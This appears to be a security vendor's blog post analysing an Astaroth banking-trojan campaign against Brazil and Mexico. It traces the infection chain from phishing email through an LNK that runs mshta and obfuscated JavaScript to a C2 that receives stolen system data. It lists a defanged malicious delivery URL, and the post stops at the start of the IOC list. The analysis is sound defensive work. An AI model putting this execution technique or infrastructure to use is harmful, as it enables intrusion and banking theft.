Astaroth Trojan Attacks Brazil and Mexico via Secureserver.net

Note from Lionel: Late last week, our X-Labs researchers saw increased activity regarding the Astaroth banking trojan delivered via secureserver[.]net URLs. It's a platform that Prashant has been tracking since his first secureserve[r.]net post back in July.

During the process of wrapping up Prashant's analysis, we noticed that researchers at Trend Micro had already published their own Astaroth research. In the spirit of sharing more information, we decided to proceed with publishing this post. 
 ###

Since my last Unseen Dangers post about malware delivered by secureserver[.]net-based URLs, the attack still continues but with different technique this time. Here is the attack chain:

EML -> URL(evasive) -> ZIP -> LNK -> MSHTA -> JS obfuscated -> C2

The campaign has impacted mostly South American regions as we see the recipient domains targeted are mostly from Brazil and Mexico. The most impacted industries are Business and Economy, Travel, Shopping, and Government agencies.

Fig. 1 -Astaroth targets

Fig. 2 - Astaroth email

The email contains secureserver[.]net link which hosts malicious file and on browsing the URL it downloads an archive file.

The secureserver[.]net link is evasive and works in Brazil region. If we check the HTML part of email, we can clearly see language is “pt-BR” which gives us a clue that URL mostly works in Southern American regions.

Fig. 3 - HTML in Astaroth email

The archive then contains a .lnk file which uses cmd.exe to execute mshta. Then MSHTA is used to perform further activities and run JavaScript. See Fig. 4 below:

Fig. 4 - LNK file and its content

• Cmd.exe – command line interpreter used to run shortcut.
• /V – Used for avoiding potentially conflicts or detection
• /c – carries command specified by string
• Mshta.exe - A legitimate Microsoft program that executes HTML Applications (HTA), which can be used maliciously to execute code through a seemingly benign HTML file

On expanding the code, we get an obfuscated script mixed of hexadecimal and octal obfuscation.

Fig. 5 - Activity series in LNK file

On deobfuscating the code, it resolves to an URL and some additional content:

Fig. 6 - Deobfuscated code

Decoding the code:

The code here has two main constraints.

1. Defined variable as an array containing two strings [7 random characters, and URL]
2. GetObject method

Working of code:

• GetObject method is used to execute the URL following the random 7 characters method name [VDZLQHG] in this case. 
• If the connection is successful, it connects to C2 and sends sensitive system data to C2. 
• If not, the process is caught silently and redirects to other clean sites, mostly social media sites such as Facebook, Twitter, LinkedIn.
• If connection is successful, the C2 network which it connects to is found to be one the banking trojans’ named as Astaroth.

The hostname here looks randomly created and seems to be malicious and could be used in phishing or malicious activities. This method of randomly generated domains is known as Domain Generation Algorithm or DGA which is used by many malware authors to generate huge amount of domains. While analyzing the campaign, as of now no critical payload has been observed.

Fig. 7 below shows the trend of distribution of this malware in last 4 months:

Protection statement

Forcepoint customers are protected against this threat at the following stages of attack:

• Stage 2 (Lure) – Delivered via weaponized URL embedded in an email. Emails and embedded URLs are blocked by email analytics, web analytics respectively and Real Time Security Analytics.
• Stage 3 (Redirect) – Identified redirections to download multiple payloads are categorized and blocked under security classification.
• Stage 5 (Dropper File) - The dropper files are added to Forcepoint malicious database and are blocked.
• Stage 6 (Call Home) - The malware contacts command and control servers (C&C) for giving out sensitive user data are categorized and blocked under security classification.

IOC list

URL delivery pattern 

• hxxps://222.183.62[.]50.host.secureserver.net 

ZIP